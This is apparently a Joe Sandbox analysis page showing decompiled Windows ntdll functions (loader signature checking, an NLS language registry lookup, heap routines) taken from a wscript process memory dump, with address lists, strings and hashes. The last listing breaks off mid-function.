0x00000000
0x059a9c97
0x0595897d
0x00000000
0x05958974
0x05958988
0x05958992
0x05958996
0x00000000
0x05958996
0x0595894c
0x00000000
0x05958870
0x0595887b
0x0595887d
0x0595887f
0x05958881
0x05958884
0x05958884
0x05958886
0x05958889
0x0595888c
0x0595888e
0x05958891
0x05958891
0x05958898
0x00000000
0x00000000
0x0595889a
0x0595889b
0x0595889e
0x00000000
0x00000000
0x059588a0
0x059588a8
0x059588b0
0x059588b2
0x059588d3
0x059588d5
0x00000000
0x059588d7
0x059588db
0x059588dc
0x059588e0
0x059588e8
0x059588ee
0x059588f0
0x059588f3
0x059588fc
0x05958901
0x05958906
0x0595890c
0x0595890c
0x0595890f
0x05958916
0x05958917
0x05958918
0x05958919
0x0595891a
0x0595891f
0x05958921
0x059a9c52
0x059a9c55
0x059a9c5b
0x059a9cac
0x059a9cc0
0x059a9cc0
0x059a9c55
0x05958927
0x05958927
0x0595892f
0x05958933
0x00000000
0x059588f5
0x059588f5
0x00000000
0x059588f7
0x059588f7
0x059588fa
0x00000000
0x00000000
0x00000000
0x00000000
0x059588fa
0x059588f5
0x059588f3
0x00000000
0x059588d5
0x00000000
0x059588b2
0x059588c9
0x00000000
0x059588c9
0x0595887f
0x0595886a
0x05958857
0x05958852
0x059588bf
0x059588bf
0x059587aa
0x059587ad
0x059587ae
0x059587b4
0x059587b5
0x059587b6
0x059587b8
0x059587bd
0x059587c1
0x059587f4
0x059587fa
0x00000000
0x00000000
0x00000000
0x059587c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 059A9C18
LdrpDoPostSnapWork, xrefs: 059A9C1E
minkernel\ntdll\ldrsnap.c, xrefs: 059A9C28

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 04b59607aa70569663ac23134ed0ab9eaa74c528b40aa0bd7b490fb78c6bfeca
Instruction ID: 070128e7e86b075b3420aacc2e4b52ebbf1da84a52aa37795bfb810a0e5aa812
Opcode Fuzzy Hash: 04b59607aa70569663ac23134ed0ab9eaa74c528b40aa0bd7b490fb78c6bfeca
Instruction Fuzzy Hash: 8991E671A04616DFDF18DF59C485ABA77BAFF84324F244069ED15AB240DB30E911CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05957E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E05957E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0595CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0594C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x5a35780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E059C5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x5a35780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E05967D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E05967D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E059C7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E05967D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E05967D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E059C7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0597A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0594B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x05957e4c
0x05957e50
0x05957e55
0x05957e58
0x05957e5d
0x05957e71
0x05957f33
0x05957e77
0x05957e77
0x05957e79
0x05957e79
0x05957e7e
0x05957f45
0x059a9848
0x00000000
0x059a9848
0x05957f4e
0x05957f53
0x05957f5a
0x00000000
0x00000000
0x059a985a
0x059a9862
0x059a9866
0x00000000
0x059a986c
0x00000000
0x059a986c
0x05957e84
0x05957e84
0x05957e8d
0x059a9871
0x05957eb8
0x05957ec0
0x05957ec0
0x05957e9a
0x059a987e
0x00000000
0x00000000
0x059a9884
0x059a988b
0x059a98a7
0x059a98ac
0x059a98b1
0x059a98b6
0x059a98b8
0x059a98b8
0x059a98b9
0x00000000
0x059a98b9
0x05957ea0
0x05957ea7
0x00000000
0x00000000
0x05957eac
0x05957eb1
0x05957ec6
0x05957ed0
0x059a98cc
0x05957ed6
0x05957ed6
0x05957ed6
0x05957ede
0x05957ee3
0x059a98e3
0x059a98f0
0x059a9902
0x059a98f2
0x059a98fb
0x059a98fb
0x059a9907
0x059a991d
0x059a991d
0x059a9907
0x059a98e3
0x05957ef0
0x05957f14
0x05957f14
0x05957f1e
0x059a9946
0x05957f24
0x05957f24
0x05957f24
0x05957f2c
0x059a996a
0x059a9975
0x059a9975
0x059a997e
0x059a9993
0x059a9993
0x059a997e
0x00000000
0x05957ef2
0x05957efc
0x05957f0a
0x05957f0e
0x059a9933
0x00000000
0x059a9933
0x00000000
0x05957f0e
0x00000000
0x00000000
0x00000000
0x05957eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 059A9891
LdrpCompleteMapModule, xrefs: 059A9898
minkernel\ntdll\ldrmap.c, xrefs: 059A98A2

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 9b4b0f04ffe2d4c3c56b603aaa19e510f3db44e6381c06bbe2ae7d801d662d7f
Instruction ID: c3f86357d9f82340c2ad9962f2db69c4fe0e2023238e2935533f7d3f9907b0e4
Opcode Fuzzy Hash: 9b4b0f04ffe2d4c3c56b603aaa19e510f3db44e6381c06bbe2ae7d801d662d7f
Instruction Fuzzy Hash: 9851F6326047449BDB25CB9CC948F2A7BE9FB40364F040969EC529B7E1D734EE14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0594E620 Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0594E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0594F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E059895D0();
						}
						if(_t78 != 0) {
							L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0598FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0598BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E05989600();
					if(_t97 < 0) {
						goto L6;
					}
					E0598BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0594F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0598BB40(_t83, _t102 + 0x24, _t78);
								if(L059543C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0598BB40(_t84, _t102 + 0x24, _t94);
									if(L059543C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0594e620
0x0594e628
0x0594e62f
0x0594e631
0x0594e635
0x0594e637
0x0594e63e
0x059a5503
0x059a5503
0x0594e64c
0x0594e64c
0x0594e651
0x00000000
0x00000000
0x0594e661
0x0594e665
0x059a542a
0x0594e715
0x0594e71a
0x0594e71c
0x0594e720
0x0594e720
0x0594e727
0x0594e736
0x0594e736
0x0594e743
0x0594e743
0x0594e673
0x0594e678
0x0594e67d
0x0594e682
0x0594e685
0x0594e692
0x0594e69b
0x0594e6a3
0x0594e6ad
0x0594e6b1
0x0594e6b2
0x0594e6bb
0x0594e6bf
0x0594e6c0
0x0594e6c8
0x0594e6cc
0x0594e6d5
0x0594e6d9
0x00000000
0x00000000
0x0594e6e5
0x0594e6ea
0x0594e6f9
0x0594e70b
0x0594e70f
0x059a5439
0x059a545e
0x059a545e
0x00000000
0x059a545e
0x059a543b
0x059a543e
0x059a5440
0x059a5445
0x059a5472
0x059a5475
0x059a548d
0x059a5493
0x059a54a9
0x00000000
0x00000000
0x059a54ab
0x059a54b4
0x059a54bc
0x059a54c8
0x059a54de
0x059a54fb
0x059a54e0
0x059a54e6
0x059a54eb
0x059a54eb
0x059a54de
0x00000000
0x059a54bc
0x059a5477
0x059a547a
0x059a5480
0x059a5483
0x059a5486
0x059a548b
0x00000000
0x00000000
0x00000000
0x059a548b
0x00000000
0x00000000
0x00000000
0x00000000
0x059a5447
0x059a5447
0x059a5447
0x059a5447
0x059a544e
0x00000000
0x00000000
0x059a5450
0x059a5452
0x059a5455
0x059a545a
0x00000000
0x00000000
0x00000000
0x059a545c
0x059a546a
0x059a546d
0x059a546f
0x00000000
0x059a546f
0x0594e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0594E68C
InstallLanguageFallback, xrefs: 0594E6DB
@, xrefs: 0594E6C0

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 7dae877ebd332ef79d8a9d3ec96b478685d659c457141cd7898a4864303e6b47
Instruction ID: 80d42c730055c23d2578e9d2a54862db132518cb2eaf341fdea17b8a079fd6a9
Opcode Fuzzy Hash: 7dae877ebd332ef79d8a9d3ec96b478685d659c457141cd7898a4864303e6b47
Instruction Fuzzy Hash: DC517F726083459BCB14DF64C444A7BB3EDBF88664F09096EF985D7250E734EE04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05A0E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E05A0E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E05A0BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E05A0BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E05A0AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E05989730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E05A0A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E05A0A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E05989730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E05A0A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E05A0A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E05962280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0595B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0595FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E05967D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E059FFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x05a0e547
0x05a0e549
0x05a0e54f
0x05a0e553
0x05a0e557
0x05a0e55a
0x05a0e55c
0x05a0e55f
0x05a0e561
0x05a0e567
0x05a0e56b
0x05a0e7e2
0x00000000
0x05a0e571
0x05a0e575
0x05a0e577
0x05a0e57b
0x05a0e57c
0x05a0e57d
0x05a0e57e
0x05a0e57f
0x05a0e588
0x05a0e58f
0x05a0e591
0x05a0e592
0x05a0e592
0x05a0e596
0x05a0e59e
0x05a0e5a0
0x05a0e5a6
0x05a0e61d
0x05a0e61d
0x05a0e621
0x05a0e623
0x05a0e630
0x05a0e630
0x05a0e7e6
0x05a0e7eb
0x05a0e7ed
0x05a0e7f4
0x05a0e7fa
0x05a0e7ff
0x05a0e7ff
0x05a0e80a
0x05a0e812
0x05a0e812
0x05a0e5ab
0x05a0e5b4
0x05a0e5b9
0x05a0e5be
0x05a0e5c0
0x05a0e5c2
0x05a0e5c8
0x05a0e5c9
0x05a0e5cb
0x05a0e5cc
0x05a0e5d5
0x05a0e5e4
0x05a0e5f1
0x05a0e5f8
0x05a0e5f8
0x05a0e5d5
0x05a0e602
0x05a0e616
0x05a0e63d
0x05a0e644
0x05a0e64d
0x05a0e652
0x05a0e657
0x05a0e659
0x05a0e65b
0x05a0e661
0x05a0e662
0x05a0e664
0x05a0e665
0x05a0e66e
0x05a0e67d
0x05a0e68a
0x05a0e691
0x05a0e691
0x05a0e66e
0x05a0e6b0
0x00000000
0x05a0e6b6
0x05a0e6bd
0x05a0e6c7
0x05a0e6d7
0x05a0e6d9
0x05a0e6db
0x05a0e6de
0x05a0e6e3
0x05a0e6f3
0x05a0e6fc
0x05a0e700
0x05a0e700
0x05a0e704
0x05a0e70a
0x05a0e70a
0x05a0e713
0x05a0e716
0x05a0e719
0x05a0e720
0x05a0e761
0x05a0e76b
0x05a0e774
0x05a0e77a
0x05a0e77a
0x05a0e78a
0x05a0e791
0x05a0e799
0x05a0e79b
0x05a0e79f
0x05a0e7aa
0x05a0e7c0
0x05a0e7ac
0x05a0e7b2
0x05a0e7b9
0x05a0e7b9
0x05a0e7c7
0x05a0e806
0x00000000
0x05a0e7c9
0x05a0e7d1
0x05a0e7d8
0x00000000
0x05a0e7d8
0x00000000
0x00000000
0x05a0e722
0x05a0e72e
0x05a0e748
0x05a0e74c
0x05a0e754
0x05a0e756
0x05a0e75c
0x05a0e75c
0x00000000
0x05a0e75c
0x05a0e758
0x05a0e758
0x00000000
0x05a0e758
0x05a0e750
0x00000000
0x00000000
0x05a0e752
0x00000000
0x05a0e752
0x05a0e730
0x05a0e735
0x05a0e73d
0x05a0e73f
0x00000000
0x00000000
0x05a0e741
0x05a0e741
0x00000000
0x05a0e741
0x05a0e739
0x00000000
0x00000000
0x05a0e73b
0x00000000
0x05a0e73b
0x05a0e722
0x05a0e720
0x05a0e6b0
0x05a0e618
0x00000000
0x05a0e618

Strings

`, xrefs: 05A0E5D7
`, xrefs: 05A0E670

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 063117a22ba09e1771470b5c20eb70ca69343b4434dd3be4f73225f5e385c065
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: B0918A316183419BE724CF25D944F2BBBEABF84714F149D2DF9A68A2C0E774E804DB52

Uniqueness

Uniqueness Score: -1.00%

Function 059C51BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E059C51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x5a205f0);
				E0599D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0595EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E059C53CA(0);
						return E0599D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0598F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E05963690(1, _t117, 0x5921810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0598AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L05964620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0598AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E059C500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
